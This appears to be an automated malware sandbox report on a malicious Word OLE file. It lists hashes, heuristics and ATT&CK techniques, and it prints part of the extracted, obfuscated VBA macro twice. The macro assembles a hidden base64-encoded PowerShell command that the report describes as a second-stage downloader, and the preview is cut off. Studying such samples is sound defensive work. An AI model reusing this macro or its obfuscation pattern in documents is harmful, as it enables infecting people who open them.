Office (OLE) malware analysis — malicious · dc9cf647244850e2

MALICIOUS

Office (OLE)

118.8 KB Created: 2018-05-24 08:43:00 Authoring application: Microsoft Office Word First seen: 2020-09-04

MD5: 3192dc555fb7dfa16030ae88b7b7a76a SHA-1: 24da5365da807a7b3e4c597e163e792108662780 SHA-256: dc9cf647244850e270086447fd97913cbf7c339ccbc10ff5d9b95289416614bd

82 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The sample is a malicious OLE document containing a VBA macro. The macro is designed to execute a PowerShell command, which is obfuscated but appears to be a downloader for a second-stage payload. The presence of the Autoopen marker and the large slack space are indicative of malicious intent.

Heuristics 4

OLE document has large unaccounted-for region high OLE_SLACK_ANOMALY

OLE file is 121,600 bytes but its declared streams total only 36,188 bytes — 85,412 bytes (70%) live in unallocated sector slack. This is the canonical hiding place for pre-macro-era Office exploit payloads (XOR-encoded shellcode reached via a parser pointer-corruption bug in the document structure).
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
VBA macros detected medium OLE_VBA_MACROS

Document contains VBA macro code
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 14757 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	14757 bytes
SHA-256: `539e284e86582e7cd360081b3ba977c0106f3b8cf9992aa7bee74bbc57e60f5c`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "LjuuDUVbpjbZYi" Function kOBowZZrP() On Error Resume Next tqcFMX = naChUZ - Cos(fwPTCw) * 1 - Chr(56015) / 3478 - ChrB(CFviuU) uXMZP = 98908 VqJZDjIh = "owersHeLL -WinD" + "owsTy" + "le hidd" + "en -e LgAoACAAK" + "ABbAHMAVABSAEk" + "ATgBHAF0" + "AJABWA" + "GUAcgBCAG8AU" + "wBlAFAA" + "UgBlAEYARQBSAGU" ptVOwv = iXZTcb - Cos(dLYKr) * 1 - Chr(10801) / 49423 - ChrB(RsuSF) KHAVf = 46870 pYYpB = "ATgBDAEUAKQBbA" + "DEALAAzAF0AKwAn" + "AHgAJwAtA" + "EoATwBpAG4AJ" + "wAnACkAKAAoAC" + "gAKAAiAHsAOAB" ZjhjF = YhWLSt - Cos(RLnOX) * 1 - Chr(88113) / 1045 - ChrB(ccTiqd) QYwwC = 64209 JihFAzamPRK = "9AHsAMwA3AH0" + "AewAxAD" + "AAOAB9AHsAOAAw" + "AH0AewA" + "yAH0AewA0ADI" + "AfQB7" + "ADEAMgB9AHsANQA" iqilF = SuhcZ - Cos(qwTlzm) * 1 - Chr(45831) / 70779 - ChrB(EOCPWE) zNVqj = 25449 BJMkjH = "2AH0Aew" + "AxADEANgB9AHsAN" + "AA1AH0AewA" + "5ADMA" + "fQB7A" + "DcANAB9AHsA" + "OQA2AH0AewAxADE" + "ANQB9AHsAOQA3A" zklozW = urFwnV - Cos(nAKfwG) * 1 - Chr(50498) / 54821 - ChrB(VjzBzU) iLdRW = 2937 Ouzwa = "H0AewAzADUAfQ" + "B7ADEAMQB9A" + "HsAMg" + "A5AH0AewAx" + "ADIAMgB9AHsAN" + "AA2AH0AewA1" zYOQJ = zRjiU - Cos(MLLjG) * 1 - Chr(12547) / 39785 - ChrB(PECVj) kWmJD = 50766 rsvTonlIZc = "ADAAfQB7ADE" + "ANAB9AHsAM" + "gAzAH0A" + "ewA4ADEAf" oMGiqQ = iEAOj - Cos(HuWbWL) * 1 - Chr(2965) / 87507 - ChrB(tWtjjm) iZfuYY = 99101 LjQfWPc = "QB7ADEAOQB9A" + "HsANQA" + "4AH0AewA1ADI" + "AfQB7ADE" + "ANQB9AH" + "sAMwAyAH0Aew" + "AxADAANgB9" + "AHsANg" + "A0AH0" + "AewAxAD" BQqPd = EnowS - Cos(zLnsYs) * 1 - Chr(84321) / 36062 - ChrB(oJjTEZ) jlOjvR = 49181 iWiSKDAAl = "EANwB9A" + "HsANgAxA" + "H0AewA2ADcAfQB" + "7ADEAMgA4" + "AH0AewA3ADAAfQ" + "B7ADkA" kOBowZZrP = VqJZDjIh + pYYpB + JihFAzamPRK + BJMkjH + Ouzwa + rsvTonlIZc + LjQfWPc + iWiSKDAAl End Function Function aSqsqMVbb() On Error Resume Next VmQkp = EkRvaT - Cos(mVjhjU) * 1 - Chr(25775) / 13743 - ChrB(vZmdE) hjvil = 65194 jDKjTDmHYDJ = "fQB7ADMANAB9AHs" + "ANgAy" + "AH0AewA4A" + "DYAfQB7A" + "DcAOQ" + "B9AHsA" + "MQAzAH0A" + "ewA5AD" mbHdB = ZOXdGo - Cos(QiCOwM) * 1 - Chr(96943) / 23054 - ChrB(rwLiBC) AshEPj = 8392 UaFZb = "QAfQB7" + "ADYAOQB9" + "AHsAMQAzA" + "DQAfQB" + "7ADEAMQA4AH0Aew" DTdhu = vjoHm - Cos(hjlZjK) * 1 - Chr(92025) / 70692 - ChrB(SXhWj) lYkjj = 58064 stYpJtBpiD = "AxADIA" + "NAB9AH" + "sAMQAzADMAfQB" + "7ADcAfQB7ADE" + "AMgA1AH0AewAx" LdiQRS = RWWODB - Cos(HHUEn) * 1 - Chr(37700) / 31515 - ChrB(vvKOAK) EaGUE = 41930 PzXhzzYBPhf = "ADMAM" + "gB9AHsAMgA4AH0" + "AewA0AD" + "kAfQB7ADgANAB9A" + "HsAMwA4AH0Aew" + "AzADkAfQB7ADcA" rStdp = vBTTiD - Cos(QPbtKM) * 1 - Chr(50041) / 66053 - ChrB(GCRlKS) IizzzQ = 3810 AWkDG = "NgB9AHsANwA" + "4AH0AewA4ADcAfQ" + "B7ADYAfQB7A" + "DYAMwB9AHsAMg" + "AwAH0AewAyA" + "DUAfQB7AD" + "cAMQB9AHsAMQA" + "zADEAfQB7AD" + "EAMgAzAH0Aew" + "AyADIAfQB7AD" aSqsqMVbb = jDKjTDmHYDJ + UaFZb + stYpJtBpiD + PzXhzzYBPhf + AWkDG End Function Function tKRHitsFj() On Error Resume Next KiZpu = rkzjro - Cos(MKsvZE) * 1 - Chr(24013) / 81904 - ChrB(DhdFK) hFizNQ = 68058 IFbhriM = "kAMAB9AHsAM" + "QB9AHsAOQAx" + "AH0Aew" + "A3ADUAfQB7ADEAN" mkoKOS = ETdwv - Cos(ECaMp) * 1 - Chr(40243) / 97041 - ChrB(sMoSGD) Braidi = 10985 LtvDtATu = "wB9AHsAM" + "gA2AH0AewA" + "yADEAfQB7ADIAN" + "AB9AHsAMQAw" + "ADMAfQ" + "B7ADYANgB9AHsA" + "MQAxADk" + "AfQB7ADQ" + "AfQB7AD" luzYr = NzJOLc - Cos(EnYvk) * 1 - Chr(10781) / 90180 - ChrB(zrIPc) bCNSu = 97744 FFhQDDGSSrb = "EAMAAxAH0AewAy" + "ADcAf" + "QB7ADUAfQB" + "7ADQANAB9AHs" pRrwHb = MiDuao - Cos(DCnsYK) * 1 - Chr(75171) / 71974 - ChrB(pIOvl) wwRdMP = 42199 vZpsZtrFhFN = "ANAAz" + "AH0AewAx" + "ADgAf" + "QB7ADkANQB9AHs" + "ANQAxAH0AewAxAD" + "MAMAB9A" + "HsAOQA4AH0" + "AewAxADEAMwB" wdiQLU = NooFYA - Cos(aWoDD) * 1 - Chr(29263) / 5392 - ChrB(sfsPiH) wbihVp = 27937 FPdFobCAtQo = "9AHsAN" + "AA4AH0AewAx" + "ADIANgB9AHs" + "ANAAxAH0Ae" + "wAxADYAfQB7A" + "DEAMQAyAH0A" + "ewAzADMAfQB7A" + "DgAOQB9AHs" ubQObU = qNwWVv - Cos(JLGdKl) * 1 - Chr(97250) / 47449 - ChrB(mhkrNX) ikLbtc = 75448 VmkMYFwa = "AMQAxAD" + "QAfQB7ADEA" + "MQAwAH0AewA" + "xADAANAB9AHs" + "A ... (truncated)

SHA-256: 539e284e86582e7cd360081b3ba977c0106f3b8cf9992aa7bee74bbc57e60f5c

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "LjuuDUVbpjbZYi"
Function kOBowZZrP()
On Error Resume Next
tqcFMX = naChUZ - Cos(fwPTCw) * 1 - Chr(56015) / 3478 - ChrB(CFviuU)
uXMZP = 98908
VqJZDjIh = "owersHeLL -WinD" + "owsTy" + "le hidd" + "en -e LgAoACAAK" + "ABbAHMAVABSAEk" + "ATgBHAF0" + "AJABWA" + "GUAcgBCAG8AU" + "wBlAFAA" + "UgBlAEYARQBSAGU"
ptVOwv = iXZTcb - Cos(dLYKr) * 1 - Chr(10801) / 49423 - ChrB(RsuSF)
KHAVf = 46870
pYYpB = "ATgBDAEUAKQBbA" + "DEALAAzAF0AKwAn" + "AHgAJwAtA" + "EoATwBpAG4AJ" + "wAnACkAKAAoAC" + "gAKAAiAHsAOAB"
ZjhjF = YhWLSt - Cos(RLnOX) * 1 - Chr(88113) / 1045 - ChrB(ccTiqd)
QYwwC = 64209
JihFAzamPRK = "9AHsAMwA3AH0" + "AewAxAD" + "AAOAB9AHsAOAAw" + "AH0AewA" + "yAH0AewA0ADI" + "AfQB7" + "ADEAMgB9AHsANQA"
iqilF = SuhcZ - Cos(qwTlzm) * 1 - Chr(45831) / 70779 - ChrB(EOCPWE)
zNVqj = 25449
BJMkjH = "2AH0Aew" + "AxADEANgB9AHsAN" + "AA1AH0AewA" + "5ADMA" + "fQB7A" + "DcANAB9AHsA" + "OQA2AH0AewAxADE" + "ANQB9AHsAOQA3A"
zklozW = urFwnV - Cos(nAKfwG) * 1 - Chr(50498) / 54821 - ChrB(VjzBzU)
iLdRW = 2937
Ouzwa = "H0AewAzADUAfQ" + "B7ADEAMQB9A" + "HsAMg" + "A5AH0AewAx" + "ADIAMgB9AHsAN" + "AA2AH0AewA1"
zYOQJ = zRjiU - Cos(MLLjG) * 1 - Chr(12547) / 39785 - ChrB(PECVj)
kWmJD = 50766
rsvTonlIZc = "ADAAfQB7ADE" + "ANAB9AHsAM" + "gAzAH0A" + "ewA4ADEAf"
oMGiqQ = iEAOj - Cos(HuWbWL) * 1 - Chr(2965) / 87507 - ChrB(tWtjjm)
iZfuYY = 99101
LjQfWPc = "QB7ADEAOQB9A" + "HsANQA" + "4AH0AewA1ADI" + "AfQB7ADE" + "ANQB9AH" + "sAMwAyAH0Aew" + "AxADAANgB9" + "AHsANg" + "A0AH0" + "AewAxAD"
BQqPd = EnowS - Cos(zLnsYs) * 1 - Chr(84321) / 36062 - ChrB(oJjTEZ)
jlOjvR = 49181
iWiSKDAAl = "EANwB9A" + "HsANgAxA" + "H0AewA2ADcAfQB" + "7ADEAMgA4" + "AH0AewA3ADAAfQ" + "B7ADkA"
kOBowZZrP = VqJZDjIh + pYYpB + JihFAzamPRK + BJMkjH + Ouzwa + rsvTonlIZc + LjQfWPc + iWiSKDAAl
End Function
Function aSqsqMVbb()
On Error Resume Next
VmQkp = EkRvaT - Cos(mVjhjU) * 1 - Chr(25775) / 13743 - ChrB(vZmdE)
hjvil = 65194
jDKjTDmHYDJ = "fQB7ADMANAB9AHs" + "ANgAy" + "AH0AewA4A" + "DYAfQB7A" + "DcAOQ" + "B9AHsA" + "MQAzAH0A" + "ewA5AD"
mbHdB = ZOXdGo - Cos(QiCOwM) * 1 - Chr(96943) / 23054 - ChrB(rwLiBC)
AshEPj = 8392
UaFZb = "QAfQB7" + "ADYAOQB9" + "AHsAMQAzA" + "DQAfQB" + "7ADEAMQA4AH0Aew"
DTdhu = vjoHm - Cos(hjlZjK) * 1 - Chr(92025) / 70692 - ChrB(SXhWj)
lYkjj = 58064
stYpJtBpiD = "AxADIA" + "NAB9AH" + "sAMQAzADMAfQB" + "7ADcAfQB7ADE" + "AMgA1AH0AewAx"
LdiQRS = RWWODB - Cos(HHUEn) * 1 - Chr(37700) / 31515 - ChrB(vvKOAK)
EaGUE = 41930
PzXhzzYBPhf = "ADMAM" + "gB9AHsAMgA4AH0" + "AewA0AD" + "kAfQB7ADgANAB9A" + "HsAMwA4AH0Aew" + "AzADkAfQB7ADcA"
rStdp = vBTTiD - Cos(QPbtKM) * 1 - Chr(50041) / 66053 - ChrB(GCRlKS)
IizzzQ = 3810
AWkDG = "NgB9AHsANwA" + "4AH0AewA4ADcAfQ" + "B7ADYAfQB7A" + "DYAMwB9AHsAMg" + "AwAH0AewAyA" + "DUAfQB7AD" + "cAMQB9AHsAMQA" + "zADEAfQB7AD" + "EAMgAzAH0Aew" + "AyADIAfQB7AD"
aSqsqMVbb = jDKjTDmHYDJ + UaFZb + stYpJtBpiD + PzXhzzYBPhf + AWkDG
End Function
Function tKRHitsFj()
On Error Resume Next
KiZpu = rkzjro - Cos(MKsvZE) * 1 - Chr(24013) / 81904 - ChrB(DhdFK)
hFizNQ = 68058
IFbhriM = "kAMAB9AHsAM" + "QB9AHsAOQAx" + "AH0Aew" + "A3ADUAfQB7ADEAN"
mkoKOS = ETdwv - Cos(ECaMp) * 1 - Chr(40243) / 97041 - ChrB(sMoSGD)
Braidi = 10985
LtvDtATu = "wB9AHsAM" + "gA2AH0AewA" + "yADEAfQB7ADIAN" + "AB9AHsAMQAw" + "ADMAfQ" + "B7ADYANgB9AHsA" + "MQAxADk" + "AfQB7ADQ" + "AfQB7AD"
luzYr = NzJOLc - Cos(EnYvk) * 1 - Chr(10781) / 90180 - ChrB(zrIPc)
bCNSu = 97744
FFhQDDGSSrb = "EAMAAxAH0AewAy" + "ADcAf" + "QB7ADUAfQB" + "7ADQANAB9AHs"
pRrwHb = MiDuao - Cos(DCnsYK) * 1 - Chr(75171) / 71974 - ChrB(pIOvl)
wwRdMP = 42199
vZpsZtrFhFN = "ANAAz" + "AH0AewAx" + "ADgAf" + "QB7ADkANQB9AHs" + "ANQAxAH0AewAxAD" + "MAMAB9A" + "HsAOQA4AH0" + "AewAxADEAMwB"
wdiQLU = NooFYA - Cos(aWoDD) * 1 - Chr(29263) / 5392 - ChrB(sfsPiH)
wbihVp = 27937
FPdFobCAtQo = "9AHsAN" + "AA4AH0AewAx" + "ADIANgB9AHs" + "ANAAxAH0Ae" + "wAxADYAfQB7A" + "DEAMQAyAH0A" + "ewAzADMAfQB7A" + "DgAOQB9AHs"
ubQObU = qNwWVv - Cos(JLGdKl) * 1 - Chr(97250) / 47449 - ChrB(mhkrNX)
ikLbtc = 75448
VmkMYFwa = "AMQAxAD" + "QAfQB7ADEA" + "MQAwAH0AewA" + "xADAANAB9AHs" + "A
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.